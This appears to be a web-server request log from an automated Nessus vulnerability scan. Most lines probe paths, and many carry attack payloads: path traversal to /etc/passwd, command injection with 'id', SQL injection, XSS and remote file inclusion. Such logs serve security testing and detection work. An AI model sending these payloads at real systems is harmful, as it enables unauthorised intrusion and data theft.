GET /nextgeneration/ HTTP/1.1
GET /niet1154627095. HTTP/1.1
GET /niet1184139586.php HTTP/1.1
GET /niet1278537297.html HTTP/1.1
GET /niet1363936620.php3 HTTP/1.1
GET /niet1367997114.asp HTTP/1.1
GET /niet1455106918.cfm HTTP/1.1
GET /niet1624641822.htm HTTP/1.1
GET /niet1759769801 HTTP/1.1
GET /niet2011071498.shtm HTTP/1.1
GET /niet218744734.php4 HTTP/1.1
GET /niet277547754.aspx HTTP/1.1
GET /niet381265202.php6 HTTP/1.1
GET /niet392925045.php5 HTTP/1.1
GET /niet531763651.jspx HTTP/1.1
GET /niet68361127.shtml HTTP/1.1
GET /niet788439768.jsp HTTP/1.1
GET /nl/ HTTP/1.1
GET /nmap.php?target=|id HTTP/1.1
GET /nnm/error.jsp HTTP/1.1
GET /noahsclassifieds/ HTTP/1.1
GET /nocc/ HTTP/1.1
GET /nonexistent_please_dont_exist HTTP/1.1
GET /normal_html.cgi?file=|id| HTTP/1.1
GET /nosuchfile-10303-10310.php3 HTTP/1.1
GET /nosuchfile-1557573638-387089364.jsp HTTP/1.1
GET /nosuchfile.php/123 HTTP/1.1
GET /note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../windows/win.ini HTTP/1.1
GET /note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../winnt/win.ini HTTP/1.1
GET /noticias/ HTTP/1.1
GET /notify?from=nessus\
GET /novelllogmanager/views/logon.html HTTP/1.1
GET /np_handler/ HTTP/1.1
GET /nph-exploitscanget.cgi?host=`id`&port=80&errchk=0&idsbypass=0 HTTP/1.1
GET /nph-mr.cgi HTTP/1.1
GET /nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.1
GET /nph-proxy.cgi HTTP/1.1
GET /nph-test-cgi?* HTTP/1.0
GET /nps/servlet/portal HTTP/1.1
GET /nquser.php HTTP/1.1
GET /nslookup.cgi?query=localhost%3bid&type=ANY&ns= HTTP/1.1
GET /nsn/..%5Cutil/chkvol.bas HTTP/1.1
GET /nsn/..%5Cutil/dir.bas HTTP/1.1
GET /nsn/..%5Cutil/glist.bas HTTP/1.1
GET /nsn/..%5Cutil/lancard.bas HTTP/1.1
GET /nsn/..%5Cutil/set.bas HTTP/1.1
GET /nsn/..%5Cutil/userlist.bas HTTP/1.1
GET /nsn/..%5Cweb/env.bas HTTP/1.1
GET /nsn/..%5Cwebdemo/fdir.bas HTTP/1.1
GET /nsn/env.bas HTTP/1.1
GET /nsn/fdir.bas HTTP/1.1
GET /nucleus/ HTTP/1.1
GET /nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/etc/passwd%00 HTTP/1.1
GET /nuked-clan/ HTTP/1.1
GET /nuked-clan/index.php?file=News&op=phpinfo HTTP/1.1
GET /nukedit/ HTTP/1.1
GET /nul.dbm HTTP/1.1
GET /nx/common/cds/menu.inc.php?c_path=http://xxxxxxxx/ HTTP/1.1
GET /obj/ HTTP/1.1
GET /objects/ HTTP/1.1
GET /observer/ HTTP/1.1
GET /ocs/ HTTP/1.1
GET /odbc/ HTTP/1.1
GET /oempro/ HTTP/1.1
GET /ofbizsetup/control/checkLogin HTTP/1.1
GET /offers/ HTTP/1.1
GET /officescan/ HTTP/1.1
GET /officescan/console/remoteinstallcgi/cgiRemoteInstall.exe HTTP/1.1
GET /ohelp/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
GET /old/ HTTP/1.1
GET /old_files/ HTTP/1.1
GET /oldfiles/ HTTP/1.1
GET /oneorzero/ HTTP/1.1
GET /onlineviewing/ HTTP/1.1
GET /ooz/ HTTP/1.1
GET /op/op.Login.php?login=guest&sesstheme=default&lang=English HTTP/1.1
GET /open.php HTTP/1.1
GET /openadmin/index.php?act=help&do=aboutOAT HTTP/1.1
GET /openads/ HTTP/1.1
GET /openbb/ HTTP/1.1
GET /openbb/index.php?CID=' HTTP/1.1
GET /openbiblio/ HTTP/1.1
GET /opencart/ HTTP/1.1
GET /openemr/ HTTP/1.1
GET /opennms/ HTTP/1.1
GET /opennms/acegilogin.jsp HTTP/1.1
GET /opensso/ HTTP/1.1
GET /opensso/UI/Login HTTP/1.1
GET /openwebmail-cgi/ HTTP/1.1
GET /openwebmail.pl HTTP/1.1
GET /openwebmail/openwebmail.pl HTTP/1.1
GET /openx/ HTTP/1.1
GET /operations-console/ HTTP/1.1
GET /oprocmgr-service/ HTTP/1.1
GET /oprocmgr-status/ HTTP/1.1
GET /oracle/ HTTP/1.1
GET /oradata/ HTTP/1.1
GET /oramon/ HTTP/1.1
GET /orangehrm/ HTTP/1.1
GET /orangehrm2/ HTTP/1.1
GET /order/ HTTP/1.1
GET /ordermgr/control/checkLogin HTTP/1.1
GET /orders/ HTTP/1.1
GET /oreon/ HTTP/1.1
GET /original/ HTTP/1.1
GET /oscommerce/ HTTP/1.1
GET /ossim/ HTTP/1.1
GET /ossim/session/login.php HTTP/1.1
GET /otrs/ HTTP/1.1
GET /outgoing/ HTTP/1.1
GET /ovlaunch.exe HTTP/1.1
GET /owl/ HTTP/1.1
GET /ownCloud/index.php HTTP/1.1
GET /owncloud/index.php HTTP/1.1
GET /owners/ HTTP/1.1
GET /p-news.php HTTP/1.1
GET /pafiledb.php HTTP/1.1
GET /pafiledb/ HTTP/1.1
GET /page.php?action=view&id=1<scr ipt>foo</script> HTTP/1.1
GET /page/portal/Design_Time_PG/Welcome HTTP/1.1
GET /pages/ HTTP/1.1
GET /pajax/ HTTP/1.1
GET /pajax/pajax_call_dispatcher.php HTTP/1.1
GET /pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1
GET /pandora_console/index.php HTTP/1.1
GET /panews/ HTTP/1.1
GET /parse_xml.cgi?action=login&filename=frameset.html|id%00| HTTP/1.1
GET /passport/ HTTP/1.1
GET /password.inc HTTP/1.1
GET /password/ HTTP/1.1
GET /password_reminder.php HTTP/1.1
GET /passwords/ HTTP/1.1
GET /patch/index.php HTTP/1.1
GET /payment/ HTTP/1.1
GET /payments/ HTTP/1.1
GET /pblang/ HTTP/1.1
GET /pccsmysqladm/ HTTP/1.1
GET /perl-status/ HTTP/1.1
GET /perl.exe?-v HTTP/1.1
GET /perl/ HTTP/1.1
GET /perl/samples/env.pl HTTP/1.1
GET /perl/samples/lancgi.pl HTTP/1.1
GET /perl/samples/ndslogin.pl HTTP/1.1
GET /perl/samples/volscgi.pl HTTP/1.1
GET /perl5/ HTTP/1.1
GET /perl?-v HTTP/1.1
GET /personal/ HTTP/1.1
GET /personal_pages/ HTTP/1.1
GET /pfdispaly.cgi?../../../../../../etc/passwd HTTP/1.1
GET /pfdispaly?../../../../../../etc/passwd HTTP/1.1
GET /pforum/ HTTP/1.1
GET /phf?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1
GET /philboard/ HTTP/1.1
GET /philboard/philboard_admin.asp HTTP/1.1
GET /phorum/ HTTP/1.1
GET /photo.php?albumid=-340'%20UNION%20SELECT%201,concat(0x73,0x69,0x74,0x65,0x78,0x5f,0x61,0x6c,0x62,0x75,0x6d,0x69,0x64,0x5f,0x73,0x71,0x6c,0x69,0x2e,0x6e,0x61,0x73,0x6c),3,4,5,6,7,8%20--%20' HTTP/1.1
GET /photo/ HTTP/1.1
GET /photoalbum/ HTTP/1.1
GET /photos/ HTTP/1.1
GET /php-blogger/ HTTP/1.1
GET /php-files/ HTTP/1.1
GET /php-ping.php?host=test&submit=Ping!&count=1|id|| HTTP/1.1
GET /php.cgi?/etc/passwd HTTP/1.1
GET /php/ HTTP/1.1
GET /php/mlog.html?screen=/etc/passwd HTTP/1.1
GET /php/mylog.html?screen=/etc/passwd HTTP/1.1
GET /php/mytutos.php HTTP/1.1
GET /php/php.exe?c:\\winnt\\win.ini HTTP/1.1
GET /phpATM/ HTTP/1.1
GET /phpAlbum/ HTTP/1.1
GET /phpBB/ HTTP/1.1
GET /phpBB2/ HTTP/1.1
GET /phpGedView/ HTTP/1.1
GET /phpMyAdmin/ HTTP/1.1
GET /phpMyConferences/ HTTP/1.1
GET /phpPhotoAlbum/ HTTP/1.1
GET /phpSecurePages/ HTTP/1.1
GET /phpSysInfo/ HTTP/1.1
GET /php_classes/ HTTP/1.1
GET /phpalbum/ HTTP/1.1
GET /phpatm/ HTTP/1.1
GET /phpauction/ HTTP/1.1
GET /phpay/ HTTP/1.1
GET /phpay/admin/phpinfo.php HTTP/1.1
GET /phpbb/ HTTP/1.1
GET /phpblogger/ HTTP/1.1
GET /phpclassifieds/ HTTP/1.1
GET /phpcoin/ HTTP/1.1
GET /phpdoc/ HTTP/1.1
GET /phpdocumentor/ HTTP/1.1
GET /phpeasydownload/ HTTP/1.1
GET /phpfm/ HTTP/1.1
GET /phpform/ HTTP/1.1
GET /phpformgenerator/ HTTP/1.1
GET /phpgedview/ HTTP/1.1
GET /phpicalendar/ HTTP/1.1
GET /phpimageview/ HTTP/1.1
GET /phpinfo.php HTTP/1.1
GET /phpix/index.phtml?mode=view&album=`id`&pic=A=10.jpg&dispsize=640&start=0 HTTP/1.1
GET /phpkit/ HTTP/1.1
GET /phpldapadmin/ HTTP/1.1
GET /phplist/ HTTP/1.1
GET /phplistpro/ HTTP/1.1
GET /phplive/ HTTP/1.1
GET /phplive/index.php HTTP/1.1
GET /phplivehelper/ HTTP/1.1
GET /phpmyadmin/ HTTP/1.1
GET /phpmyagenda/ HTTP/1.1
GET /phpmyconferences/ HTTP/1.1
GET /phpmyfaq/ HTTP/1.1
GET /phpnews/ HTTP/1.1
GET /phpnews/sendtofriend.php?mid='1' HTTP/1.1
GET /phpnuke/ HTTP/1.1
GET /phppgadmin/ HTTP/1.1
GET /phpping/index.php?pingto=www.nessus.org%20|%20dir HTTP/1.1
GET /phpprojekt/ HTTP/1.1
GET /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1410938849&lang_crm=../../../../../../../../../../../..//etc/passwd%00 HTTP/1.1
GET /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1410938849&lang_crm=../../vtigerservice.php%00 HTTP/1.1
GET /phprocketaddin/?page=../../../../../../../../../../../../../../../WINNT/system32/ipconfig.exe HTTP/1.1
GET /phprocketaddin/?page=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /phprojekt/ HTTP/1.1
GET /phprojekt/setup.php HTTP/1.1
GET /phproxy/ HTTP/1.1
GET /phpsane/ HTTP/1.1
GET /phpslash/ HTTP/1.1
GET /phpsupporttickets/ HTTP/1.1
GET /phpsurveyor/ HTTP/1.1
GET /phpsysinfo/ HTTP/1.1
GET /phptonuke.php?filnavn=/etc/passwd HTTP/1.1
GET /phpu/ HTTP/1.1
GET /phpupdate/ HTTP/1.1
GET /phpwcms/ HTTP/1.1
GET /phpwebadmin/ HTTP/1.1
GET /phpwebgallery/ HTTP/1.1
GET /phpwebsite/ HTTP/1.1
GET /phpwebthings/ HTTP/1.1
GET /phpwt/ HTTP/1.1
GET /phpx/ HTTP/1.1
GET /pipermail/ HTTP/1.1
GET /piranha/ HTTP/1.1
GET /piranha/secure/control.php3? HTTP/1.1
GET /piwigo/ HTTP/1.1
GET /pixelpost/ HTTP/1.1
GET /pla/ HTTP/1.1
GET /platform-ui/ HTTP/1.1
GET /plc/webvisu.htm HTTP/1.1
GET /pligg/ HTTP/1.1
GET /plog-download.php?dl_type=album&checked[]='%20UNION%20SELECT%20'plogger_checked_sql_injection.nasl'%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%20--%20 HTTP/1.1
GET /plog-rss.php?level=collection&id=999%20OR%20plogger_id_sql_injection.nasl HTTP/1.1
GET /plog/ HTTP/1.1
GET /plogger/ HTTP/1.1
GET /plone/ HTTP/1.1
GET /pls/ HTTP/1.1
GET /pls/apex/f?p=nessuscheck HTTP/1.1
GET /pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /pluck/ HTTP/1.1
GET /plugins/preview/preview.html HTTP/1.1
GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
GET /plume/ HTTP/1.1
GET /pm/add_ons/mail_this_entry/mail_authocheck.php?pm_path=http://xxxxxxxx./&sfx=.txt HTTP/1.1
GET /pma/ HTTP/1.1
GET /pmos/ HTTP/1.1
GET /pmwiki.php HTTP/1.1
GET /pmwiki.php?GLOBALS[FarmD]=/etc/passwd%00 HTTP/1.1
GET /pmwiki/ HTTP/1.1
GET /podcast/ HTTP/1.1
GET /podcasts/ HTTP/1.1
GET /poll/ HTTP/1.1
GET /poll/misc/info.php HTTP/1.1
GET /pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.1
GET /pollphp/ HTTP/1.1
GET /polls/ HTTP/1.1
GET /popup.php?include_path=/etc/passwd%00 HTTP/1.1
GET /port.php?proto=tcp' HTTP/1.1
GET /portal HTTP/1.1
GET /portal/ HTTP/1.1
GET /portal/page/portal/Design_Time_PG/Welcome HTTP/1.1
GET /portal/pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
GET /portal/server.pt? HTTP/1.1
GET /portal_dojo/layerLoader.jsp?path=file:///etc/passwd%00 HTTP/1.1
GET /portal_dojo/layerLoader.jsp?path=file:/etc/passwd%00 HTTP/1.1
GET /portalapp/ HTTP/1.1
GET /poster/ HTTP/1.1
GET /poster/index.php HTTP/1.1
GET /postgres/ HTTP/1.1
GET /poxy/ HTTP/1.1
GET /ppwb/ HTTP/1.1
GET /preferences.php?action=setcookie HTTP/1.1
GET /prestashop/ HTTP/1.1
GET /print.php?what=article&id=' HTTP/1.1
GET /printenv.pl HTTP/1.1
GET /printers/ HTTP/1.1
GET /printfaq.php?lng=en&pg=1 HTTP/1.1
GET /priv/ HTTP/1.1
GET /privado/ HTTP/1.1
GET /private/ HTTP/1.1
GET /processSimple.do HTTP/1.1
GET /prod/ HTTP/1.1
GET /profil.php?id=1%20<scr ipt>foo</script> HTTP/1.1
GET /project/ HTTP/1.1
GET /projectpier/ HTTP/1.1
GET /projects/ HTTP/1.1
GET /projects_site/uploadfile.php?demoSession=1 HTTP/1.1
GET /properties/configuration.php?tab=Status HTTP/1.1
GET /properties/description.dhtml HTTP/1.1
GET /protected/ HTTP/1.1
GET /protection.php?action=logout&siteurl=/etc/passwd HTTP/1.1
GET /prueba/ HTTP/1.1
GET /pruebas/ HTTP/1.1
GET /prv/ HTTP/1.1
GET /psunami.cgi?file=|id| HTTP/1.1
GET /psynch/ HTTP/1.1
GET /ptnews/ HTTP/1.1
GET /ptnews/index.php?edit=nonexistant409802886 HTTP/1.1
GET /pub/ HTTP/1.1
GET /pubcookie/ HTTP/1.1
GET /public/ HTTP/1.1
GET /public/proxy.php?url=%3cscript%3ealert('clarkconnect_url_xss.nasl')%3c%2fscript%3e HTTP/1.1
GET /public_html/ HTTP/1.1
GET /publica/ HTTP/1.1
GET /publicar/ HTTP/1.1
GET /publico/ HTTP/1.1
GET /publish/ HTTP/1.1
GET /publisher/ HTTP/1.1
GET /punbb/ HTTP/1.1
GET /purchase/ HTTP/1.1
GET /purchases/ HTTP/1.1
GET /pw/ HTTP/1.1
GET /pwa/ HTTP/1.1
GET /pwcgi/smpwservicescgi.exe?TARGET=http://www.nessus.org HTTP/1.1
GET /query.cgi HTTP/1.1
GET /query.idq?CiTemplate=../../../../../winnt/win.ini HTTP/1.1
GET /query.idq?CiTemplate=../../../../../winnt/win.ini%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
GET /query?group=-- HTTP/1.1
GET /quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd%00html HTTP/1.1
GET /quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1
GET /qwe/qwe/index.html HTTP/1.1
GET /rails_info/properties HTTP/1.1
GET /random_banner/ HTTP/1.1
GET /rbacx/welcome.action HTTP/1.1
GET /rbacx_staging/welcome.action HTTP/1.1
GET /rc/ HTTP/1.1
GET /rcblog/ HTTP/1.1
GET /rcladmin/js/art_i18n/nls/art_i18n.js HTTP/1.1
GET /rdp/ HTTP/1.1
GET /rdweb/login/login.html HTTP/1.1
GET /subdomain.domain.7z HTTP/1.1
GET /subdomain.domain.Z HTTP/1.1
GET /subdomain.domain.bz2 HTTP/1.1
GET /subdomain.domain.gz HTTP/1.1
GET /subdomain.domain.jar HTTP/1.1
GET /subdomain.domain.tld.7z HTTP/1.1
GET /subdomain.domain.tld.Z HTTP/1.1
GET /subdomain.domain.tld.bz2 HTTP/1.1
GET /subdomain.domain.tld.gz HTTP/1.1
GET /subdomain.domain.tld.jar HTTP/1.1
GET /subdomain.domain.tld.rar HTTP/1.1
GET /subdomain.domain.tld.tar HTTP/1.1
GET /subdomain.domain.tld.tar.bz2 HTTP/1.1
GET /subdomain.domain.tld.tar.gz HTTP/1.1
GET /subdomain.domain.tld.tgz HTTP/1.1
GET /subdomain.domain.tld.war HTTP/1.1
GET /subdomain.domain.tld.z HTTP/1.1
GET /subdomain.domain.tld.zip HTTP/1.1
GET /subdomain.domain.rar HTTP/1.1
GET /subdomain.domain.tar HTTP/1.1
GET /subdomain.domain.tar.bz2 HTTP/1.1
GET /subdomain.domain.tar.gz HTTP/1.1
GET /subdomain.domain.tgz HTTP/1.1
GET /subdomain.domain.war HTTP/1.1
GET /subdomain.domain.z HTTP/1.1
GET /subdomain.domain.zip HTTP/1.1
GET /recordings/ HTTP/1.1
GET /recordings/index.php HTTP/1.1
GET /ref/ HTTP/1.1
GET /register/ HTTP/1.1
GET /registered/ HTTP/1.1
GET /rem/ HTTP/1.1
GET /remindpasswd HTTP/1.1
GET /remotehtmlview.php?phpAds_path=http://xxxxxxxx HTTP/1.1
GET /report/ HTTP/1.1
GET /reporter/client.jsp HTTP/1.1
GET /reports/ HTTP/1.1
GET /reports/rwservlet HTTP/1.1
GET /reseller/ HTTP/1.1
GET /resetpw.php?email=../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /rest-service/reviews-v1/versionInfo HTTP/1.1
GET /rest/api/2.0.alpha1/serverInfo HTTP/1.1
GET /rest/api/2/serverInfo HTTP/1.1
GET /restricted/ HTTP/1.1
GET /retail/ HTTP/1.1
GET /review.php?id=1&cat=&subcat=%22%3E%3cscript%3ealert('phpmydirectory_multiple_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /reviews/ HTTP/1.1
GET /robohelp/server?area=robohelpserver_apsb09_14_safe.nasl HTTP/1.1
GET /robots.txt HTTP/1.1
GET /roller/ HTTP/1.1
GET /root/ HTTP/1.1
GET /roschedule.php HTTP/1.1
GET /rot13sj.cgi?/etc/passwd HTTP/1.1
GET /roundcube/ HTTP/1.1
GET /roundcubemail/ HTTP/1.1
GET /rpc.php?cmd=display_get_requesters&id=1 HTTP/1.1
GET /rsrc/ HTTP/1.1
GET /rss.php?blogId=1&profile=../../config/config.properties.php%00 HTTP/1.1
GET /rth/ HTTP/1.1
GET /rtrlet/rtr?act=network.Login&rtyp=login HTTP/1.1
GET /runcms/ HTTP/1.1
GET /s_form.cgi HTTP/1.1
GET /sabin/SiteAdmin.htm HTTP/1.1
GET /sales/ HTTP/1.1
GET /samba/smb2www.pl HTTP/1.1
GET /sample/ HTTP/1.1
GET /samples/ HTTP/1.1
GET /samples/sample_posteddata.php HTTP/1.1
GET /sane/ HTTP/1.1
GET /sapmc/sapmc.html HTTP/1.1
GET /save.php?file_save=/etc/passwd HTTP/1.1
GET /save/ HTTP/1.1
GET /sawmill6cl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
GET /sawmillcl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
GET /sbbs/ HTTP/1.1
GET /sblog/ HTTP/1.1
GET /sc3/console.php?psid=101 HTTP/1.1
GET /scan/ HTTP/1.1
GET /scgi-bin/platform.cgi HTTP/1.1
GET /schedule/ HTTP/1.1
GET /scmadmin/ HTTP/1.1
GET /scmadmin/LocalIndex.html HTTP/1.1
GET /scp.dll/sendto?template=../../../../../../../../../../../../boot.ini%00gwextranet_template_dir_traversal.nasl HTTP/1.1
GET /scribe/ HTTP/1.1
GET /script/ HTTP/1.1
GET /script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E HTTP/1.1
GET /scripts/ HTTP/1.1
GET /scripts/!pwds.txt HTTP/1.1
GET /scripts/%2f/admin.html HTTP/1.1
GET /scripts/%3f.jsp HTTP/1.1
GET /scripts/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
GET /scripts/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
GET /scripts//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ HTTP/1.1
GET /scripts//plugins/db/mysql/mysql.inc.php HTTP/1.1
GET /scripts/1410938729-ror_session_fixation.nasl HTTP/1.1
GET /scripts/500page.jsp HTTP/1.1
GET /scripts/?Mode=debug HTTP/1.1
GET /scripts/?cmd=Config HTTP/1.1
GET /scripts/?ho+{COMPLETE_VERSION} HTTP/1.1
GET /scripts/?mod=read&id=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/?p=subscribe HTTP/1.1
GET /scripts/?showimage=')%20UNION%20SELECT%20'pixelpost_15rc1.nasl-1410938961.jpg'%20as%20id%2c%201065139044%20as%20headline%2c%201924427916%20as%20datetime%2c%201893107577%20as%20body%2c%201653805833%20as%20category%2c%201741141526%20as%20image-- HTTP/1.1
GET /scripts/?user=jffnms_user_sql_injection.nasl'%20UNION%20SELECT%202%2c'admin'%2c'%241%24RxS1ROtX%24IzA1S3fcCfyVfA9rwKBMi.'%2c'Administrator'--&file=index&pass= HTTP/1.1
GET /scripts/About/frmAbout.aspx HTTP/1.1
GET /scripts/Admin.php HTTP/1.1
GET /scripts/BrowserWeb/portal/portalbanner.htm HTTP/1.1
GET /scripts/CFIDE/probe.cfm HTTP/1.1
GET /scripts/CategoryView.aspx?category=nessus HTTP/1.1
GET /scripts/ChangeLog HTTP/1.1
GET /scripts/Config/diff.php?file=%26id&new=1&old=2 HTTP/1.1
GET /scripts/Count.cgi?align=topcenter HTTP/1.1
GET /scripts/Edit.jsp?page=User&editor=../../../Install HTTP/1.1
GET /scripts/GTcatalog/index.php?function=custom&custom=http://xxxxxxxx/1 HTTP/1.1
GET /scripts/GTcatalog/password.inc HTTP/1.1
GET /scripts/PJreview_Neo.cgi?p=../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/README.TXT HTTP/1.1
GET /scripts/SLwebmail/ShowLogin.dll?Language=fr HTTP/1.1
GET /scripts/SPT--ForumTopics.php?forumid=-9%20UNION%20SELECT%20null%2cnull%2cnull%2c1410939058%2c4%2c5 HTTP/1.1
GET /scripts/Security/login HTTP/1.1
GET /scripts/ServerView/SnmpView/SnmpListMibValues?SSL=&Server=(ip addr)&ThisApplication=TestConnectivityFirst&ServerName=bcmes&Servername=127.0.0.1;id;,SType--Server&ParameterList=What--primary,,OtherCommunity--{{OtherCommunity}},,SecondIP--,,Timeout--5,,Community--public,,SType--,,ASPresent--1 HTTP/1.1
GET /scripts/SystemInfo HTTP/1.1
GET /scripts/UI/Login?user=nessus-1410938469 HTTP/1.1
GET /scripts/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1
GET /scripts/WihPhoto/start.php HTTP/1.1
GET /scripts/WorkArea/ContentDesigner/ekformsiframe.aspx?id=\
GET /scripts/YaBB.pl HTTP/1.1
GET /scripts/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/Z4UIbRKguuPS.asp HTTP/1.1
GET /scripts/Z4UIbRKguuPS.cfm HTTP/1.1
GET /scripts/Z4UIbRKguuPS.cgi HTTP/1.1
GET /scripts/Z4UIbRKguuPS.html HTTP/1.1
GET /scripts/Z4UIbRKguuPS.inc HTTP/1.1
GET /scripts/Z4UIbRKguuPS.php HTTP/1.1
GET /scripts/Z4UIbRKguuPS.php3 HTTP/1.1
GET /scripts/Z4UIbRKguuPS.pl HTTP/1.1
GET /scripts/Z4UIbRKguuPS.sh HTTP/1.1
GET /scripts/Z4UIbRKguuPS.shtml HTTP/1.1
GET /scripts/_admin/ HTTP/1.1
GET /scripts/_head.php?_zb_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
GET /scripts/a1stats/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
GET /scripts/about.php HTTP/1.1
GET /scripts/account/?action=Login HTTP/1.1
GET /scripts/account/login.php HTTP/1.1
GET /scripts/acegilogin.jsp HTTP/1.1
GET /scripts/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ HTTP/1.1
GET /scripts/acp/index.php HTTP/1.1
GET /scripts/acp/lib/inserts.sql HTTP/1.1
GET /scripts/activatemember?activatecode=&member=%22%3e%3cscript%3ealert('mvnforum_activatemember_xss.nasl')%3c%2fscript%3e HTTP/1.1
GET /scripts/add.cgi HTTP/1.1
GET /scripts/add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
GET /scripts/add_user.php HTTP/1.1
GET /scripts/addentry.php HTTP/1.1
GET /scripts/addschup HTTP/1.1
GET /scripts/adlayer.php?layerstyle=../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/admin.php HTTP/1.1
GET /scripts/admin.php?dpt=conf&sub=general HTTP/1.1
GET /scripts/admin.php?loggedin=1 HTTP/1.1
GET /scripts/admin.php?style=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/admin.php?zfaction=config HTTP/1.1
GET /scripts/admin.pl?path=bin/mozilla&action=list_users HTTP/1.1
GET /scripts/admin/ HTTP/1.1
GET /scripts/admin/addentry.php?phpbb_root_path=/etc/passwd%00 HTTP/1.1
GET /scripts/admin/admin.php HTTP/1.1
GET /scripts/admin/admin.php?sid=' HTTP/1.1
GET /scripts/admin/admin.php?sid=0' HTTP/1.1
GET /scripts/admin/cal_login.php HTTP/1.1
GET /scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1410938913 HTTP/1.1
GET /scripts/admin/configset.php?settings_dir=/etc/passwd%00 HTTP/1.1
GET /scripts/admin/connect.inc HTTP/1.1
GET /scripts/admin/define.inc.php?match=http://xxxx./ HTTP/1.1
GET /scripts/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/admin/general.php?mode=perlinfo&config[General][perl_binary]=cat%20/etc/passwd|| HTTP/1.1
GET /scripts/admin/index.html HTTP/1.1
GET /scripts/admin/index.php?act=login&username='%20UNION%20SELECT%201,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus HTTP/1.1
GET /scripts/admin/index.php?cmd=login HTTP/1.1
GET /scripts/admin/index.php?username=advanced_poll_var_overwrite.nasl&pollvars[poll_username]=advanced_poll_var_overwrite.nasl&password=1358231371&pollvars[poll_password]=c95fcc1c8bced888ff1cf49c92996c81 HTTP/1.1
GET /scripts/admin/ip_manage.php HTTP/1.1
